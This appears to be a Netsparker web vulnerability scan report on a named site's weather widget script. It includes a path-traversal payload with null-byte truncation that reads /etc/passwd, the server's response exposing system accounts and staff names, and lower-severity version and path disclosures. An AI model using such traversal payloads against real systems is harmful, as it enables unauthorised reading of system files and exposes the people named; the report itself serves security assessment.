country GET us
state GET Virginia
city GET Reston
smallicon GET 1
current GET 1
forecast GET 1
background_color GET ffffffffffff
color GET 000000
width GET 175
padding GET 10
border_width GET 1
border_color GET 000000
font_size GET 11
font_family GET Verdana
showicons GET ../../../../../../../../../../../etc/passwdweather_widget.php

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=../../../../../../../../../../../etc/passwd%00weather_widget.php HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:43 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 568
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64root:x:0:0:root:/root:/bin/bashdaemon:x:1:1:daemon:/usr/sbin:/bin/shbin:x:2:2:bin:/bin:/bin/shsys:x:3:3:sys:/dev:/bin/shsync:x:4:65534:sync:/bin:/bin/syncgames:x:5:60:games:/usr/games:/bin/shman:x:6:12:man:/var/cache/man:/bin/shlp:x:7:7:lp:/var/spool/lpd:/bin/shmail:x:8:8:mail:/var/mail:/bin/shnews:x:9:9:news:/var/spool/news:/bin/shuucp:x:10:10:uucp:/var/spool/uucp:/bin/shproxy:x:13:13:proxy:/bin:/bin/shwww-data:x:33:33:www-data:/var/www:/bin/shbackup:x:34:34:backup:/var/backups:/bin/shlist:x:38:38:Mailing List Manager:/var/list:/bin/shirc:x:39:39:ircd:/var/run/ircd:/bin/shgnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/shnobody:x:65534:65534:nobody:/nonexistent:/bin/shlibuuid:x:100:101::/var/lib/libuuid:/bin/shsyslog:x:101:103::/home/syslog:/bin/falsesshd:x:102:65534::/var/run/sshd:/usr/sbin/nologinjphilp:x:1000:1000:Jason Philp,,,:/home/jphilp:/bin/bashafarooq:x:1001:1001:Ahmed Farooq,,,:/home/afarooq:/bin/bashpostfix:x:103:106::/var/spool/postfix:/bin/falsedealwatch:x:1002:1003:,,,:/home/dealwatch:/bin/bash
Apache Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is an Apache server. This was disclosed through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of Apache.

Impact

An attacker can search for specific security vulnerabilities for the version of Apache identified within the SERVER header.

Remedy

Configure your web server to prevent information leakage from the SERVER header of its HTTP response.
- /weather/weather_widget.php

/weather/weather_widget.php

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Extracted Version

2.2.14 (Ubuntu)

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 426
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64document.write('<div style="background-color: #ffffffffffff; color: #000000; width: 175px; padding: 10px; border: 1px #000000 solid; text-align: center; line-height: 1.6em; font-size: 11px; font-family: Verdana;"><b>WEBMASTER of this website:</b> The HTML you used is now out-dated. Please re-copy the HTML from <a href="http://www.showmyweather.com/">ShowMyWeather.com</a> without modification. Once updated the widget will function properly within 30 minutes.</div>');
PHP Version Disclosure

1 TOTAL
LOW
Netsparker identified that the target web server is disclosing the PHP version in use through the HTTP response. This information can help an attacker to gain a greater understanding of the systems in use and potentially develop further attacks targeted at the specific version of PHP.

Impact

An attacker can look for specific security vulnerabilities for the version identified. The attacker can also use this information in conjunction with other vulnerabilities in the application or the web server.
- /weather/weather_widget.php

/weather/weather_widget.php

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Extracted Version

PHP/5.3.2-1ubuntu4.7

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 426
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64document.write('<div style="background-color: #ffffffffffff; color: #000000; width: 175px; padding: 10px; border: 1px #000000 solid; text-align: center; line-height: 1.6em; font-size: 11px; font-family: Verdana;"><b>WEBMASTER of this website:</b> The HTML you used is now out-dated. Please re-copy the HTML from <a href="http://www.showmyweather.com/">ShowMyWeather.com</a> without modification. Once updated the widget will function properly within 30 minutes.</div>');
[Possible] Internal Path Leakage (*nix)

1 TOTAL
INFORMATION
Netsparker identified an internal path in the document.

Impact

There is no direct impact; however, this information can help an attacker during the exploitation of some other vulnerabilities.

Remediation

External References

- /weather/weather_widget.php

/weather/weather_widget.php

http://www.ibegin.com/weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&small..

Identified Internal Path(s)

/home/ibegin.com/public_html/weather/weather_widget.php

Request

GET /weather/weather_widget.php?type=js&country=us&state=Virginia&city=Reston&smallicon=1&current=1&forecast=1&background_color=ffffffffffff&color=000000&width=175&padding=10&border_width=1&border_color=000000&font_size=11&font_family=Verdana&showicons=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.ibegin.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Mon, 02 May 2011 10:39:23 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
Vary: Accept-Encoding
Content-Encoding:
Content-Length: 426
Content-Type: text/html


Notice: Undefined index: old in /home/ibegin.com/public_html/weather/weather_widget.php on line 24Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64Notice: Undefined index: measure in /home/ibegin.com/public_html/weather/weather_widget.php on line 64document.write('<div style="background-color: #ffffffffffff; color: #000000; width: 175px; padding: 10px; border: 1px #000000 solid; text-align: center; line-height: 1.6em; font-size: 11px; font-family: Verdana;"><b>WEBMASTER of this website:</b> The HTML you used is now out-dated. Please re-copy the HTML from <a href="http://www.showmyweather.com/">ShowMyWeather.com</a> without modification. Once updated the widget will function properly within 30 minutes.</div>');